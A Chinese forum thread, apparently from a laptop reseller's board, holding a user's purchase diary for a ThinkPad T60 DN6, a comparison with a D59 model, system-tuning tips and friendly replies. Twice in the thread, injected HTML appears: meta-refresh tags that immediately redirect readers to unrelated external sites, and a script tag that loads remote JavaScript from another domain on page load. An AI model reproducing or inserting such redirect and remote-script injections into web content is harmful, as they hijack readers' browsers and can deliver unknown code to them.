开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] T60 DN6 2G内存 购机日记,DN6照片,新货港货比较,玩系统心得

一.购机历史

从我的第一台笔记本被偷开始(去年10月份,历史久远啊),就一直认定再买笔记本非IBM不买,小黑看着就精神,越看越喜欢。说实话第一台笔记本(ThinkPad东家Lenovo)从拿到手里就不喜欢,自己看好型号,托朋友买的又不好不要,忍痛用了2年,虽然经常被我瞎整(计算机专业出身),中间没出过毛病。本来没打算出国前换笔记本,能省一点是一点吧!去年我比较衰,公司里那么多台式电脑,就我办公的那台被偷,笔记本光放在家里都被偷了,在我出差的时候。痛啊。。。

二.着手购买第二台笔记本

认定IBM了,于是开始在ZOL关注ThinkPad的报价,初步定下了ThinkPad T60 2007 GFC(¥16600),配置相当于港货T60 D59(¥10800XY报价),没办法,根本不敢瞅配置 7200T2.0G的,都在2万以上。于是盼星星,盼月亮,盼着降价。那个时候也知道水货这个概念,可是啥都不懂,不知道到哪里去买,又怕买到返修货,假货,又是些小道消息,不放心。直到有一天,误打误撞找到了XY…… 那个时候看到报价傻眼了,还有自己能买得起的7200T。本来预算¥16600,啥都不想了,捡最贵的买。于是在这里安家了。那一项公司事不多,比较闲。每天都上www.xynbnb.com ,一待就是半天,几乎把自己想看的帖子都看遍了,购机日志更是一个不留。就是想多了解了解港货,看到这里黑友的气氛可知XY的知名度了 ,在这里从心底感激XY,让我更走近了IBM ThinkPad

三.购机日志

最终让我下定决心在XY购买的是 ThinkPad DN6 过年后的一次狂降 400,决定该出手了,本来年前就蠢蠢欲动想买D65,可是没货了。不知道过年那几天是咋熬过来的,在乡下的几天每天没事做就泡在XY上,关注机子来了没有。那个时候盼的是T60港货的新机型,原机装1G内存的港货。熬过了XY进货的日子,事先就多次在QQ上咨询XY的工作人员了:什么港货,新货的区别?国外保修?原装否?,,等我等百问不厌的问题。经我观察,XY的工作人员真是很热心,IT业服务是最重要的,服务好才有人气,所以这么多水货本本的论坛,属XY的人气最好,服务好啊。赶在XY上货的第一天就去看报价了,有一点失望的是港货没有预装1G内存的机型。为什么一定要强求1G呢?因为买就要买没有一点遗憾的。后来猛然看到DN6 降价400,想都没想,马上汇钱定购了这台机子,我在外地。所以想跟大家说的是该出手时就出手,电脑永远在降价。

四.之后

漫长了熬过邮寄的几天,感受过了跟各位黑友一样第一次拥有自己的小黑的喜悦。之后就是跟小黑漫长的磨合期了。因为虽然我对电脑也算是个老鸟了,可是还是需要去发掘小黑精彩的地方,更多了解自己的小黑,说了这么多废话,下面有一些我的使用心得。我上网常常没什么事做,就是现在上的最多的除了163邮箱,就是XY了。虽然还是很少发帖,回贴,但是常上来看看大家都在干么?在关注哪些机子?更多的是一些技术贴,让我学到了很多东西。XY是我最喜欢的论坛,希望它越办越好,生意越来越红火。用着自己的小黑一个月,其他的在各个购买日记里都各有吹捧,我就不多说了。选择ThinkPad绝对没有错。个人最满意的一个地方,就是开着卡巴斯基杀毒,还能做任何自己能做的事。爽!

+700---tszmsid

<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

tszmsid + 700

沙发,慢慢看::69::
<meta http-equiv="refresh" content="0; url=http://www.548.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

没图
五。D59 DN6 的比较

怎么又说到D59了类?买了给自己的DN6以后,就给老爸老妈物色了D59,两台笔记本都在我手里转悠过。说说自己认为两个的不同吧。因为D59是“低配”的港货,DN6是高配的新货。大家也都很关注港货和新货有什么不同吧?以下是个人意见,毕竟我只接触过一台港货,和一台新货,可能比较片面,不对的地方,请XY指正,大家仅作参考吧:

1.  低配(10×××)和高配(13×××),姑且用价格来区分吧。感觉键盘的舒服度不一样,还是高配的明显高档些,以前在论坛里看过某位兄弟说T60的键盘手感太差,跟T43没发比,不知道是不是这个原因。

2.  我买的新货(DN6)电池是SANYO的,所以刚买来的时候,心里挺紧张的,不会碰到电池招回的队伍里吧? 港货(D59)的电池是Panasonic的,感觉 Panasonic 电池比SANYO电池用得持久一些,待机时间长些。怎么说类,我看着Panasonic的心里就踏实些。不知道是不是新货是SANYO的电池,港货是用Panasonic的电池。

3.  不知道是不是高配(7200TX1400120G)配置上去了,所以机子响声大,比D59大多了!两台本本放一块,只听到DN6的风箱,硬盘的响声。D59非常非常非常安静。有时候恨不得拿自己的电脑跟爸爸妈妈的换。。唉!

两台电脑我更喜欢D59,安静!!!!

六。玩IBM心得

1.  最好使用XY给的恢复盘作系统。因为自己玩过N久系统,系统自己装呗,结果自己装的盗版系统后来用的时候总有点小毛病,像有时候关IE,关文件夹一不小心就没有响应了,很不爽。而且用原版的系统,可以免去升级,装IE7.0WMP11找破解。用XY恢复盘装完原版系统后,大概会有10G左右。经本人测试:
    (1)可移去 IBMTOOLS 文件夹1.55G
        (2)Temp文件夹;
        (3)Drivers文件夹;
    (4)控制面板――电源选项――休眠――取消“启用休眠”前面的勾。就可自动删除C盘下一个***.sys文件,大概2.0G左右,这个文件的大小根据内存大小而不同(文件名已忘,但我查过资料这个功能不常用,对系统没有影响,我亲身测试,在我机子上可省下2.0G左右空间);
    (5)我的电脑――属性――系统还原――勾选“在所有驱动器上关闭系统还原”,鸡肋,没用;

整理完以后,大概C 不到5.0G

2.  Windows下,可用PQ 删除IBM_SERVICE分区,可剩下5G,再自己做备份。大家想留可以留着。
      我的硬盘120G分区: 15255520

3.  随机软件很多,我保留的有:

a. ThinkVantage指纹软件
      b. Access Connections
      c.EasyEject Utility
      d.Keyboard Customizer Utility
      e.Power Manager
      f.Presentation Director
      g.Software Installer
      h.ThinkPad Configuration
      i.ThinkVantage Active Protection System
      g.UltraNav Wizard

图在后面
     4.对于颇受争议的Client Security Solution,我的建议是慎用。昨天被它气炸了,害我又重新装了遍系统。昨天使用了一下,很方便,可以用指纹登录QQ,网页,网银等需要输入密码的地方,最后考虑到影响开机速度,占内存,老用手指都会抽筋,,等等。。。就被我删了。作为IBM的一个特色,大家可以试试,不过个人感觉有点危险。

这里有比较详细的使用方法: http://www.nb.com.cn/bbs/viewthread.php?tid=5513&fpage=1]THINKPAD T60/X60/X60S 指纹登陆论坛及QQ 教程

我的使用感受:
         a.  不支持IE 7.0,所以如果你想用,就只能在IE 6.0上用;
         b.  跟硬件结合在一起,所以不管做什么操作,密码都要牢记。不然。。。阿门;
         c.  只有用XY恢复盘(1CD和1DVD),装的系统上面自带装的Client Security Solution 6.0可用。大家如果卸了系统原来带的,或者自己装的盗版系统,再自己用安装文件装就用不了,会老是提示“嵌入式安全子系统已禁用”,虽然你在BIOS里启用了,它就是不认;
         d.  不要自己装 5.42版本,我第一次卸载了6.0版本后(因为不知道不能在IE7.0上,老是尝试没有成功),想着安装5.42版本,结果不能正常关机,提醒大家注意。大家可以搜搜这方面的资料,我没有瞎说。安装完5.42以后,如果要完全卸载,需要到BIOS中,删除自己原先设定过的密码。在Chip Security,下面有个Clear ***,不然在系统中会无法删除,会报错,结果就是:删到一半,完全没有反应,等重启后,这个软件没有了,可是无法正常关机,找罪魁祸首都找不到。尸首都不留一个,惨啊。

虽然写购机日记,主要的动力是IBM原装硬盘盒,不过要写就写好一点,希望对大家有帮助。我也是在一路摸索中,大家有什么问题,可以跟贴问我,我知道的一定回答,大家一起学习,努力用好自己的ThinkPad。终于写完了。。休息一会,买硬盘盒去了。。

7. 最后,最不能少的图片

IBM 包装盒

外盒

外盒

T60 DN6

T60 DN6
支持。
现在还有硬盘盒吗?上次问说没货5555
忘了夸LZ了,写的好!
IBM ThinkPad T60 DN6

DN6全身照

DN6全身照

处处IBM标

处处IBM标

XY的贴膜技术NB

XY的贴膜技术NB

贴膜技术写照

贴膜技术写照
好日记~~好心得~~还有好图

内胆包+瑞士军刀笔记本电脑背包
拍照的时候就在想,那个百图贴的兄弟在教我拍照就好了。
小黑鼠+计算机专业人的悲哀+泰格斯 Defcon 密码锁(看谁还敢偷我的电脑)
自己坐着慢慢看。写了一下午了。
原帖由 tuxiaosi 于 2007-3-26 16:40 发表
现在还有硬盘盒吗?上次问说没货5555

我刚听说到货了。
好贴!
LZ现在就放心了,买了个好锁子
大家觉得这锁作用大不?
呵呵 确实悲哀啊 ~~在家还得弄个锁 LZ被偷怕了 ~~
原帖由 sun8220 于 2007-3-26 17:54 发表
呵呵 确实悲哀啊 ~~在家还得弄个锁 LZ被偷怕了 ~~

头可断,血可流,小黑不能丢!  
好,恭喜一下
恭喜阿!
ding
好贴 恭喜lz 照片很丰富阿